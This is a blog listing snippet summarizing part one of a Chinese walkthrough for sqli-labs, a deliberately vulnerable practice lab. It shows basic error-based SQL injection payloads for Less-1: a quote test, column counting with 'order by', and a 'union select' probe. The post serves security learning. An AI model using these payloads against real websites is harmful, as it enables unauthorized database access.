2022年8月14日
sqli-labs通关之路-上
摘要: Page1 less-1基于错误的GET单引号字符型注入 首先在末尾添加单引号 ​ ?id=1' 报错 然后猜解列数 ?id=1 order by 1 --+ 正常 ?id=1 order by 4 --+ 报错 说明列数为3 联合查询 ?id=-1'union select 1,2,3--+ 回显 阅读全文
posted @ 2022-08-14 17:37 Haibara-Z3r0 阅读(63) 评论(0) 推荐(0) 编辑